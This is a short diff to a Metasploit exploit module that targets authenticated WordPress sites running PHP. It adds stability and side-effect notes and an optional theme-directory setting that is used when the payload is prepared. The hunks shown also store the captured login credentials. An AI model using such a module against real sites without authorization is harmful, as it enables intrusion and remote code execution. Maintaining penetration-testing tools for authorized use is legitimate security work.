@@ -40,13 +40,20 @@ class MetasploitModule < Msf::Exploit::Remote
       'Platform'        => 'php',
       'Arch'            => ARCH_PHP,
       'Targets'         => [['WordPress', {}]],
-      'DefaultTarget'   => 0
+      'DefaultTarget'   => 0,
+      'Notes'           =>
+      {
+        'Stability' => [ CRASH_SAFE ],
+        'Reliability' => [ REPEATABLE_SESSION ],
+        'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]
+      }
     ))
 
     register_options(
       [
         OptString.new('USERNAME', [true, 'The WordPress username to authenticate with']),
-        OptString.new('PASSWORD', [true, 'The WordPress password to authenticate with'])
+        OptString.new('PASSWORD', [true, 'The WordPress password to authenticate with']),
+        OptString.new('THEME_DIR', [false, 'The WordPress theme dir name (disable theme auto-detection if provided)'])
       ])
   end
 
@@ -420,7 +427,7 @@ class MetasploitModule < Msf::Exploit::Remote
     store_valid_credential(user: username, private: password, proof: cookie)
 
     print_status("Preparing payload...")
-    @current_theme = get_current_theme
+    @current_theme = (datastore['THEME_DIR'].blank? ? get_current_theme : datastore['THEME_DIR'])
     wp_nonce = get_wpnonce(cookie)
     @current_date = Time.now.strftime("%Y/%m/")
 
